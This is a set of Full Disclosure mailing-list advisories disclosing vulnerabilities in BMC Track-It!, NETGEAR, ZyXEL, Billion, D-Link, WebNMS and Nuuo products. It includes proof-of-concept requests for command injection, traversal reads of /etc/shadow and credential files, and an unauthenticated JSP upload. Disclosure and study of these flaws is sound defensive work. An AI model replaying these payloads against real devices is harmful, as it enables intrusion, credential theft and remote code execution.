BMC contacted me asking for advice on how to fix the issues, to which I
responded:
"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is
to implement authentication and authorisation. There is no other way to
fix it.
[...] Make sure the auth is done properly. You will have to negotiate
some kind of session key using the user's credential at the start and
use that session key for encryption going forward. Do not use a fixed
key, as this can be reverse engineered.
If you don't implement such mechanism, it's just a question of time
before someone else breaks your protection and finds new vulnerabilities."

On December 9th 2014, BMC released Track-It! 11.4 [2], which they
claimed had fixed the security vulnerabilities.

At first glance, this seemed to be true. Traffic in Wireshark did seem
to be encrypted. However upon further inspection, it became obvious that
while the actual method invocation and its arguments were being
encrypted using a DES key, there was still no authentication being done.
What this means in practice is that anyone can negotiate a new
encryption key with the server and use that from then on to invoke
remote methods without ever authenticating to the server, even for the
initial encryption key exchange.

The code can be inspected by decompiling TrackIt.Utility.Common.dll. The
interesting part is in:
namespace TrackIt.Utility.Common.Remoting
{
    internal enum SecureTransaction
    {
        Uninitialized,
        SendingPublicKey,
        SendingSharedKey,
        SendingEncryptedMessage,
        SendingEncryptedResult,
        UnknownIdentifier,
        UnauthenticatedClient
    }
}
This represents the state machine that the server uses to track client
requests. The initial state is UnauthenticatedClient for any unknown
client. A typical communication would be as follows:
1- Client generates a RSA key, which it shares with the server by
sending a Modulus and an Exponent.
2- Server creates a DES key and sends that key back to the client
3- Client and server now share an encryption key; that key is used to
pass back messages back and forth (states SendingEncryptedMessage and
SendingEncryptedResult).

As it is evident, at no point there is any authentication or credentials
being passed from the client to the server. So while all traffic is
encrypted, anyone can negotiate an encryption key with the server and
invoke an

Re: [FD] [0-day] RCE and admin credential disclosure in NETGEAR WNR2000

2017-01-30 Thread Pedro Ribeiro
An update on this post:

MITRE has provided me with CVE numbers.
CVE-2016-10175 for #1 (information disclosure)
CVE-2016-10176 for #2 (improper access control)
CVE-2016-10174 for #3 (stack buffer overflow)

In addition, NETGEAR has recognised the flaw and released beta firmware
that is supposed to fix this vulnerability. This claim was NOT verified.
The beta firmware can be downloaded from:
http://kb.netgear.com/36549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability?cid=wmt_netgear_organic

Regards,
Pedro

On 20/12/16 21:42, Pedro Ribeiro wrote:
> Hi,
> 
> tl;dr
> RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or
> over the WAN if remote administration is enabled.
> 10.000 devices affected show up in Shodan - these are the ones with
> remote admin enabled. There are likely tens of thousands of vulnerable
> routers in private LANs as this device is extremely popular.
> 
> As usual, NETGEAR did not respond to any of my emails, so I'm releasing
> this advisory and exploit code as a 0-day.
> See [1] for the exploit code, but bear in mind it is only "alpha"
> quality. A more robust exploit will be released in the next week and
> sent upstream to Metasploit.
> 
> MITRE has not assigned any CVE numbers yet but I will keep trying to get
> them. If they are not obtained then this vulnerability should be
> referred with the BID / BugTraq number that will be assigned to it.
> 
> A copy of the advisory is in
> https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt
> 
> Regards,
> Pedro
> 
>>> Stack buffer overflow vulnerability in NETGEAR WNR2000 router
>>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
> Security
> ==
> Disclosure: 20/12/2016 / Last updated: 20/12/2016
> 
>>> Background on the affected products:
> "Wirelessly connect all of your computers and mobile devices. N300 WiFi
> speed lets you simultaneously download, stream music and video, and game
> online. NETGEAR genie® makes it easy to setup and monitor your network.
> Parental controls keep your Internet experience safe and secure."
> 
> 
>>> Summary:
> The NETGEAR WNR2000 allows an administrator to perform a number of
> sensitive functions in the web interface through an apparent CGI script
> named apply.cgi. This script is invoked when changing Internet settings,
> WLAN settings, restore to factory defaults, reboot the router, etc.
> However apply.cgi is not really a script, but a function that is invoked
> in the HTTP server (uhttpd) when it receives that string in the URL.
> When reversing uhttpd, it was found that it also allows an
> unauthenticated user to perform the same sensitive admin functions if
> apply_noauth.cgi is invoked instead.
> Some of the functions, such as rebooting the router, can be exploited
> straight away by an unauthenticated attacker. Other functions, such as
> changing Internet, WLAN settings or retrieving the administrative
> password, require the attacker to send a "timestamp" variable attached
> to the URL. This timestamp is generated every time the target page is
> accessed and functions as a sort of anti-CSRF token.
> The timestamp generating function was reverse engineered and due to
> incorrect use of random number generation (details below) it is possible
> to identify the token in less than 1000 attempts with no other previous
> knowledge.
> 
> By combining this knowledge with an information leakage, it is possible
> to recover the administrator password. This password is then used to
> enable telnet functionality in the router and obtain a root shell if the
> attacker is in the LAN.
> 
> Finally, a stack buffer overflow was also discovered, which combined
> with the apply_noauth.cgi vulnerability and the timestamp identifying
> attack allows an unauthenticated attacker to take full control of the
> device and execute code remotely. This vulnerability allows the attacker
> to execute code in the LAN and in the WAN.
> 
> It should be noted that the WNR2000v5 does not have remote
> administration enabled by default on the latest firmware, and unless the
> administrator enables it, this attack is only possible in the LAN. Only
> the WNR2000v5 device was tested, but versions 3 and 4 of this router
> should also be vulnerable. At the time of the initial disclosure, there
> are over 10.000 vulnerable routers appearing in a Shodan search.
> 
> Exploit code has been released with this advisory, but it is of "alpha"
> quality (see [1]). This exploit code will be improved and ported to
> Metasploit in the next week.
> 
> 
>>> Technical details:

[FD] Multiple RCE in ZyXEL / Billion / TrueOnline routers

2017-01-17 Thread Pedro Ribeiro
Hi,

TrueOnline is a Thai ISP that distributes customised versions of ZyXEL
and Billion routers - customised with vulnerabilities that is.
The routers contain several default administrative accounts and command
injections that can be abused by authenticated and unauthenticated
attackers. Details in the advisory below, which is a copy of
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt
Metasploit modules have been released, see below.

This vulnerability was disclosed through the Securiteam Secure
Disclosure program:
https://blogs.securiteam.com/index.php/archives/2910
http://www.beyondsecurity.com/ssd

Regards,
Pedro

===
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 26/12/2016 / Last updated: 12/01/2017


>> Summary:
TrueOnline is a major Internet Service Provider in Thailand which
distributes various rebranded ZyXEL and Billion routers to its customers.
Three router models - ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion
5200W-T - contain a number of default administrative accounts, as well
as authenticated and unauthenticated command injection vulnerabilities
in their web interfaces, mostly in the syslog remote forwarding
function. All the routers are still in widespread use in Thailand, with
the Billion 5200W-T router currently being distributed to new customers.

These routers are based on the TC3162U SoC (or variants of it), a
system-on-a-chip made by TrendChip, which was a manufacturer of SoC that
was acquired by Ralink / MediaTek in 2011.
TC3162U based routers have two firmware variants.

The first variant is "ras", used on hardware versions that have 4mb or
less of flash storage, which is based on the real time operating system
ZynOS. It is infamous as it includes Allegro RomPager v4.07, which is
vulnerable to the "misfortune cookie" attack (see [1]), and its web
server is vulnerable to the "rom-0" attack (see [2]).
The other variant is "tclinux", which is a full fledged Linux used in
hardware versions that have more than 4 MB of flash storage. This
advisory refers to this variant, which includes the Goahead web server
and several ASP files with the command injection vulnerabilities. Note
that tclinux might also be vulnerable to the misfortune cookie and rom-0
attacks - this was not investigated in detail by the author. For more
information on tclinux see [3].

It should be noted that tclinux contains files and configuration
settings in other languages (for example in Turkish). Therefore it is
likely that these firmware versions are not specific to TrueOnline, and
other ISP customised routers in other countries might also be
vulnerable. It is also possible that other brands and router models that
use the tclinux variant are also affected by the command injection
vulnerabilities (the default accounts are likely to be TrueOnline
specific). Please contact ped...@gmail.com if you find any other routers
or firmware versions that have the same vulnerabilities.

These vulnerabilities were discovered in July 2016 and reported through
Securiteam's Secure Disclosure program (see
https://blogs.securiteam.com/index.php/archives/2910 for their
advisory). SSD contacted the vendors involved, but received no reply and
posted their advisory on December 26th 2016. There is currently no fix
for these issues. It is unknown whether these issues are exploitable
over the WAN, although this is a possibility since some of the default
accounts appear to have been deployed for ISP use.

Three Metasploit modules that abuse these vulnerabilities have been
released (see [4], [5] and [6]).


>> Technical details:
#1
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T v1)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN.
See below for other constraints.
Affected versions:
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions
might be affected

This router has a command injection vulnerability in the Maintenance >
Logs > System Log > Remote System Log forwarding function.
The vulnerability is in the ViewLog.asp page, which is accessible
unauthenticated. The following request will cause the router to issue 3
ping requests to 10.0.99.102:

POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1_syslog_Flag=1=1=0_host=%3bping+-c+3+10.0.99.102%3b%23=Save

The command injection is in the remote_host parameter.
This vulnerability was found during a black box assessment of the web
interface, so a root cause was not determined.


#2
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacke

[FD] [0-day] RCE and admin credential disclosure in NETGEAR WNR2000

2016-12-21 Thread Pedro Ribeiro
Hi,

tl;dr
RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or
over the WAN if remote administration is enabled.
10.000 devices affected show up in Shodan - these are the ones with
remote admin enabled. There are likely tens of thousands of vulnerable
routers in private LANs as this device is extremely popular.

As usual, NETGEAR did not respond to any of my emails, so I'm releasing
this advisory and exploit code as a 0-day.
See [1] for the exploit code, but bear in mind it is only "alpha"
quality. A more robust exploit will be released in the next week and
sent upstream to Metasploit.

MITRE has not assigned any CVE numbers yet but I will keep trying to get
them. If they are not obtained then this vulnerability should be
referred with the BID / BugTraq number that will be assigned to it.

A copy of the advisory is in
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt

Regards,
Pedro

>> Stack buffer overflow vulnerability in NETGEAR WNR2000 router
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 20/12/2016 / Last updated: 20/12/2016

>> Background on the affected products:
"Wirelessly connect all of your computers and mobile devices. N300 WiFi
speed lets you simultaneously download, stream music and video, and game
online. NETGEAR genie® makes it easy to setup and monitor your network.
Parental controls keep your Internet experience safe and secure."


>> Summary:
The NETGEAR WNR2000 allows an administrator to perform a number of
sensitive functions in the web interface through an apparent CGI script
named apply.cgi. This script is invoked when changing Internet settings,
WLAN settings, restore to factory defaults, reboot the router, etc.
However apply.cgi is not really a script, but a function that is invoked
in the HTTP server (uhttpd) when it receives that string in the URL.
When reversing uhttpd, it was found that it also allows an
unauthenticated user to perform the same sensitive admin functions if
apply_noauth.cgi is invoked instead.
Some of the functions, such as rebooting the router, can be exploited
straight away by an unauthenticated attacker. Other functions, such as
changing Internet, WLAN settings or retrieving the administrative
password, require the attacker to send a "timestamp" variable attached
to the URL. This timestamp is generated every time the target page is
accessed and functions as a sort of anti-CSRF token.
The timestamp generating function was reverse engineered and due to
incorrect use of random number generation (details below) it is possible
to identify the token in less than 1000 attempts with no other previous
knowledge.

By combining this knowledge with an information leakage, it is possible
to recover the administrator password. This password is then used to
enable telnet functionality in the router and obtain a root shell if the
attacker is in the LAN.

Finally, a stack buffer overflow was also discovered, which combined
with the apply_noauth.cgi vulnerability and the timestamp identifying
attack allows an unauthenticated attacker to take full control of the
device and execute code remotely. This vulnerability allows the attacker
to execute code in the LAN and in the WAN.

It should be noted that the WNR2000v5 does not have remote
administration enabled by default on the latest firmware, and unless the
administrator enables it, this attack is only possible in the LAN. Only
the WNR2000v5 device was tested, but versions 3 and 4 of this router
should also be vulnerable. At the time of the initial disclosure, there
are over 10.000 vulnerable routers appearing in a Shodan search.

Exploit code has been released with this advisory, but it is of "alpha"
quality (see [1]). This exploit code will be improved and ported to
Metasploit in the next week.


>> Technical details:
#1
Vulnerability: Information leakage
NO CVE ASSIGNED
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions:
- WNR2000v5, all firmware versions (confirmed in hardware)
- WNR2000v4, all firmware versions possibly affected (confirmed only by
static analysis)
- WNR2000v3, all firmware versions possibly affected (confirmed only by
static analysis)

The device leaks its serial number when performing a request to
http:///BRS_netgear_success.html:
HTTP/1.0 200 OK
Server: uhttpd/1.0.0
Date: Thu, 01 Jan 1970 00:11:42 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html; charset="UTF-8"
Connection: close






[FD] [CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow

2016-11-08 Thread Pedro Ribeiro
tl;dr

A stack bof in several Dlink routers, which can be exploited by an
unauthenticated attacker in the LAN. There is no patch as Dlink did not
respond to CERT's requests. As usual, a Metasploit module is in the
queue (see [9] below) and should hopefully be integrated soon.

The interesting thing about this vulnerability is that it affects both
ARM and MIPS devices, so exploitation is slightly different for each type.

Link to CERT's advisory:
https://www.kb.cert.org/vuls/id/677427

Link to a copy of the advisory pasted below:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt

Have fun.

Regards,
Pedro

>> Multiple vulnerabilities in Dlink DIR routers HNAP Login function
(multiple routers affected)
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 07/11/2016 / Last updated: 07/11/2016

>> Background on the affected products:
"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and
more – all being connected at the same time. That’s why we created the
new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to
3.2Gbps, it delivers the necessary ultra-performance to power even the
most demanding connected homes, making it the best wireless home router
for gaming."


>> Summary:
Dlink routers expose a protocol called HNAP (Home Network Administration
Protocol) on the LAN interface. This is a SOAP protocol that allows
identification, configuration, and management of network devices. It
seems Dlink uses an implementation of this protocol to communicate with
the router's web interface over the LAN. For more information regarding
HNAP, see [1] and [2].

Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in
particular seems to have found a lot of them (see [3], [4], [5], [6],
[7], [8]).

This new vulnerability occurs in the processing of XML tags inside SOAP
messages when performing the HNAP Login action. The affected function
contains two subsequent stack overflows, which can be exploited by an
unauthenticated attacker on the LAN. It affects a number of Dlink
routers which span the ARM and MIPS architectures. A Metasploit module
that exploits this vulnerability for both architectures has been
released [9].

A special thanks to CERT/CC and Trent Novelly for help with disclosing
this vulnerability to the vendor. Please refer to CERT's advisory for
more details [10].


>> Technical details:
Vulnerability: Stack buffer overflow
CVE-2016-6563
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions:
  The following MIPS devices have been confirmed to be vulnerable:
DIR-823
DIR-822
DIR-818L(W)

  The following ARM devices have been confirmed to be vulnerable:
DIR-895L
DIR-890L
DIR-885L
DIR-880L
DIR-868L -> Rev. B and C only

  There might be other affected devices which are not listed above.

---
Vulnerability details and MIPS exploitation
---

The vulnerable function, parse_xml_value (my name, not a symbol), is
called from hnap_main (a symbol in the binary) in /htdocs/cgibin.
This function takes 3 arguments: the first is the request object /
string, the second is the XML tag name to be parsed inside the request,
and the third is a pointer to where the value of that tag should be
returned.

The function tries to find the tag name inside the request object and
then extracts the tag value, copying it first to a local variable and
then to the third argument. This function is called from hnap_main when
performing the HNAP Login action to obtain the values of Action,
Username, LoginPassword and Captcha from the SOAP request shown above.

parse_xml_value(char* request, char* XMLtag, char* tag_value)
(...)
.text:00412264 xml_tag_value_start = $s2
.text:00412264 xml_tag_value_end = $s1
.text:00412264 C30 addu    xml_tag_value_start, $v0, $s0
 # s2 now points to $value
.text:00412268 C30 la      $t9, strstr
.text:0041226C C30 move    $a1, xml_tag_value_end  # needle
.text:00412270 C30 jalr    $t9 ; strstr
.text:00412274 C30 move    $a0, xml_tag_value_start  # haystack
.text:00412278 C30 lw      $gp, 0xC30+var_C20($sp)
.text:0041227C C30 beqz    $v0, loc_4122BC
.text:00412280 C30 subu    xml_tag_value_end, $v0, xml_tag_value_start  # s1 now holds the ptr to value$
.text:00412284 C30 bltz    xml_tag_value_end, loc_4122BC
.text:00412288 C30 addiu   $s0, $sp, 0xC30+xml_tag_var
.text:0041228C C30 la      $t9, strncpy
.text:00412290 C30 move    $a2, xml_tag_value_end  # n
.text:00412294 C30 move    $a1, xml_tag_value_start  # 

[FD] [CVE-2016-6600/1/2/3]: Multiple vulnerabilities (RCE, file download, etc) in WebNMS Framework 5.2 / 5.2 SP1

2016-08-12 Thread Pedro Ribeiro
tl;dr

RCE, file download, weak encryption and user impersonation, all of which
can be exploited by an unauthenticated attacker in WebNMS Framework 5.2
and 5.2 SP1.

A special thanks to Beyond Security and their SSD program, which helped
disclose the vulnerabilities. See their advisory at
https://blogs.securiteam.com/index.php/archives/2712

My full advisory can be seen below, and a copy can be obtained at the
github repo
https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt

Metasploit modules have also been released.

Regards,
Pedro



>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 04/07/2016 / Last updated: 08/08/2016

>> Background on the affected product:
"WebNMS is an industry-leading framework for building network management
applications. With over 25,000 deployments worldwide and in every Tier 1
Carrier, network equipment providers and service providers can
customize, extend and rebrand WebNMS as a comprehensive Element
Management System (EMS) or Network Management System (NMS).
NOC Operators, Architects and Developers can customize the functional
modules to fit their domain and network. Functional modules include
Fault Correlation, Performance KPIs, Device Configuration, Service
Provisioning and Security. WebNMS supports numerous Operating Systems,
Application Servers, and databases."


>> Summary:
WebNMS contains three critical vulnerabilities that can be exploited by
an unauthenticated attacker: one directory traversal that can be used to
achieve remote code execution, another directory traversal that can be
abused to download any text file in the system and the possibility to
impersonate any user in the system. In addition, WebNMS also stores the
user passwords in a file with a weak obfuscation algorithm that can be
easily reversed.

A special thanks to the SecuriTeam Secure Disclosure programme (SSD),
which performed the disclosure in a responsible manner to the affected
vendor. This advisory can be seen in their blog at
https://blogs.securiteam.com/index.php/archives/2712


>> Technical details:
#1
Vulnerability: Directory traversal in file upload functionality (leading
to remote code execution)
CVE-2016-6600
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FileUploadServlet has a directory traversal vulnerability, that
allows an unauthenticated attacker to upload a JSP file that executes on
the server.
To exploit this vulnerability, simply POST as per the proof of concept
below. The directory traversal is in the "fileName" parameter.

POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1


There are two things to keep in mind for the upload to be successful:
- Only text files can be uploaded, binary files will be mangled.
- In order to achieve code execution without authentication, the files
need to be dropped in ../jsp/ but they can only have the following
names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of
any length.


#2
Vulnerability: Directory traversal in file download functionality
CVE-2016-6601
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. Only text
files can be downloaded properly, any binary file will get mangled by
the servlet and downloaded incorrectly.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The FetchFile servlet has a directory traversal vulnerability that can
be abused by an unauthenticated attacker to download arbitrary files
from the WebNMS host. The vulnerable parameter is "fileName" and a proof
of concept is shown below.

GET /servlets/FetchFile?fileName=../../../etc/shadow


#3
Vulnerability: Weak obfuscation algorithm used to store passwords
CVE-2016-6602
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory)
contains entries with all the usernames and passwords in the server:



The algorithm used to obfuscate is convoluted but easy to reverse
engineer. The passwords above are "guest" for the "guest" user and
"admin" for the "root" user. A Metasploit module implementing the
deobfuscation algorithm has been released.

This vulnerability can be combined with #2 and allow an unauthenticated
attacker to obtain credentials for all user accounts:
GET /servlets/FetchFile?fileName=conf/securitydbData.xml


#4
Vulnerability: User account impersonation / hijacking
CVE-2016-6603
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1

Re: [FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

2016-08-05 Thread Pedro Ribeiro
On 04/08/16 17:46, Pedro Ribeiro wrote:
> tl;dr
> 
> Lots of RCE, hardcoded credentials, stack buffer overflow and
> information disclosure in the Nuuo NVRmini and other network video
> recorders of the same vendor.
> These vulnerabilities also affect the NETGEAR Surveillance app (which
> can be installed on the NETGEAR ReadyNAS).
> 
> See the full advisory including PoC and exploits below, or at my github
> (https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt).
> 
> Metasploit modules have been submitted for vulns #1, #2 and #3:
> https://github.com/rapid7/metasploit-framework/pull/7180
> https://github.com/rapid7/metasploit-framework/pull/7181
> https://github.com/rapid7/metasploit-framework/pull/7182
> 
> Thanks to CERT/CC for helping me disclose these vulnerabilities - see
> https://www.kb.cert.org/vuls/id/856152 for their advisory.
> 
> Regards,
> Pedro
> 
> ==
> 
>>> Fix:
> NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see
> Timeline below), so no fix is available.
> Do not expose any of these devices to the Internet or any networks with
> untrusted hosts.
> 
> Timeline:
> 28.02.2016: Disclosure to CERT/CC.
> 27.04.2016: Requested status update from CERT - they did not receive any
> response from vendors.
> 06.06.2016: Requested status update from CERT - still no response from
> vendors.
> Contacted Nuuo and NETGEAR directly. NETGEAR responded with
> their "Responsible Disclosure Guidelines", to which I did not agree and
> requested them to contact CERT if they want to know the details about
> the vulnerabilities found. No response from Nuuo.
> 13.06.2016: CERT sent an update saying that NETGEAR has received the
> details of the vulnerabilities, and they are attempting to contact Nuuo
> via alternative channels.
> 07.07.2016: CERT sent an update saying that they have not received any
> follow up from both Nuuo and NETGEAR, and that they are getting ready
> for disclosure.
> 17.07.2016: Sent an email to NETGEAR and Nuuo warning them that
> disclosure is imminent if CERT doesn't receive a response or status
> update. No response received.
> 01.08.2016: Sent an email to NETGEAR and Nuuo warning them that
> disclosure is imminent if CERT doesn't receive a response or status
> update. No response received.
> 04.08.2016: Coordinated disclosure with CERT.
> 
> 
>>> References:
> [1] https://www.kb.cert.org/vuls/id/856152
> 
> 
> 
> Agile Information Security Limited
> http://www.agileinfosec.co.uk/
>>> Enabling secure digital business >>

Forgot to mention - these are actually "0 days" since the vendors didn't
bother to respond or issue fixes - see timeline above.

Regards,
Pedro


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

2016-08-05 Thread Pedro Ribeiro
tl;dr

Lots of RCE, hardcoded credentials, stack buffer overflow and
information disclosure in the Nuuo NVRmini and other network video
recorders of the same vendor.
These vulnerabilities also affect the NETGEAR Surveillance app (which
can be installed on the NETGEAR ReadyNAS).

See the full advisory including PoC and exploits below, or at my github
(https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt).

Metasploit modules have been submitted for vulns #1, #2 and #3:
https://github.com/rapid7/metasploit-framework/pull/7180
https://github.com/rapid7/metasploit-framework/pull/7181
https://github.com/rapid7/metasploit-framework/pull/7182

Thanks to CERT/CC for helping me disclose these vulnerabilities - see
https://www.kb.cert.org/vuls/id/856152 for their advisory.

Regards,
Pedro

==
>> Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices
and NETGEAR ReadyNAS Surveillance application
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 04/08/2016 / Last updated: 04/08/2016


>> Background on the affected products:
"NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the
perfect solution for small retail chain stores. NVRmini 2 also comes
full equipped as a NAS, so you can enjoy the full storage benefits like
easy hard drive hot-swapping and RAID functions for data protection.
Choose NVR and know that your valuable video data is safe, always."
"NVRsolo is NUUO’s answer to hassle free, lightweight NVR system. It is
small in size yet able to handle heavy duty tasks. With local HDMI/VGA
display and keyboard/mouse input built right into the unit, configuring
NVRsolo is easy and simple. Built on solid Linux foundation, we
sacrificed nothing except unnecessary bulk to make NVRsolo the award
winning standalone NVR solution you have been looking for. NVRsolo's
flexibility doesn't end there. For those needing more storage options,
we offer 8 bay versions to meet your needs."
"NUUO Crystal™ is the product that represents the next stage in VMS
evolution. Rock solid, easily manageable, with powerful recording and
viewing options available. Featuring revolutionary modular system
structure that is made to handle large project size, NUUO Crystal™ is
the ideal choice for your enterprise. Featuring technology that focuses
on delivering stable video recording performance, recording failover,
and 3rd party integration choice, you will be impressed with the
stability and flexible options with NUUO Crystal™."
"(ReadyNAS Surveillance) NETGEAR combines leading storage and switching
solutions together with sophisticated network video recording software
to provide an affordable and easy to install and manage surveillance
solution. Small businesses and corporate branch offices require a secure
way to protect physical assets, but may lack deep security expertise or
a big budget. A user-friendly NVR system should combine fast and
flexible configuration with easy operation. With a few simple steps for
installation, the web-based management leads users to configure, monitor
and playback video everywhere. UPnP search, auto camera detection and
GUI schedule save setting-up time, while the easy drag and drop camera,
auto scan, preset point patrolling, and multiple views offer users a
prime monitoring experience."


>> Summary:
NUUO is a vendor of Network Video Recording (NVR) systems for
surveillance cameras. These NVR are Linux embedded video recording
systems that can manage a number of cameras and are used worldwide by
public institutions, banks, SME's, etc. They also provide a software
package to NETGEAR that adds network video recording and monitoring
capabilities to the well known NETGEAR ReadyNAS Network Attached Storage
systems.

The web interface contains a number of critical vulnerabilities that can
be abused by unauthenticated attackers. These consist of monitoring
backdoors left in the PHP files that are supposed to be used by NUUO's
engineers, hardcoded credentials, poorly sanitised input and a buffer
overflow which can be abused to achieve code execution on NUUO's devices
as root, and on NETGEAR as the admin user.

Although only the NVRmini 2, NVRsolo, Crystal and ReadyNAS Surveillance
devices are known to be affected, it is likely that the same code is
used in other NUUO devices or even other third party devices (the
firmware is littered with references to other devices like NUUO Titan).
However this has not been confirmed as it was not possible to access all
NUUO and third party devices that might be using the same code.

A special thanks to CERT/CC (https://www.cert.org/) for assistance wi

[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300

2016-02-03 Thread Pedro Ribeiro
Hi,

CERT/CC has helped me disclose two vulnerabilities in NETGEAR's
Pro"safe" Network Management System 300 [1]. Two classical bugs: one
remote code execution via arbitrary file upload and an authenticated
arbitrary file download.

The full advisory can be seen in my repo at [2] and it is also pasted
below. I've also released two Metasploit modules to exploit these
vulnerabilities [3][4].

There is currently no fix for these - do not expose NMS300 to the
Internet! I've decided to release the exploits anyway as CERT's advisory
details how the vulnerability can be exploited.

Regards,
Pedro

[1] https://www.kb.cert.org/vuls/id/777024
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt
[3] https://github.com/rapid7/metasploit-framework/pull/6530
[4] https://github.com/rapid7/metasploit-framework/pull/6531


>> Remote code execution / arbitrary file download in NETGEAR ProSafe
Network Management System NMS300
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 04/02/2016 / Last updated: 04/02/2016


>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.

The NETGEAR Management System NMS300 delivers insight into network
elements, including third-party devices. An intuitive, web-based user
interface makes it easier to monitor and administer an entire network."


>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows
systems. It has two serious vulnerabilities that can be exploited by a
remote attacker. The first one is an arbitrary file upload vulnerability
that allows an unauthenticated attacker to execute Java code as the
SYSTEM user.
The second vulnerability is an arbitrary file download that allows an
authenticated user to download any file from the host that is running
NMS300.

A special thanks to Joel Land of CERT/CC for helping disclose this
vulnerability under ID 777024 [1]. Two new Metasploit modules that
exploit these vulnerabilities have been released.


>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload
(unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload

@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload

The JSP file can be uploaded as shown below, it will be named
null[name].[extension] and can be reached on
http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final
file will be named "nulltesting.jsp". [name] and [extension] can be seen
in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data;
boundary=--ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata";
filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Hello World Example</title>
</head>
<body>
A Hello World Example of JSP.
</body>
</html>
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--


#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the
path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../===1337=Netgear=4=FS526Tv2=bla

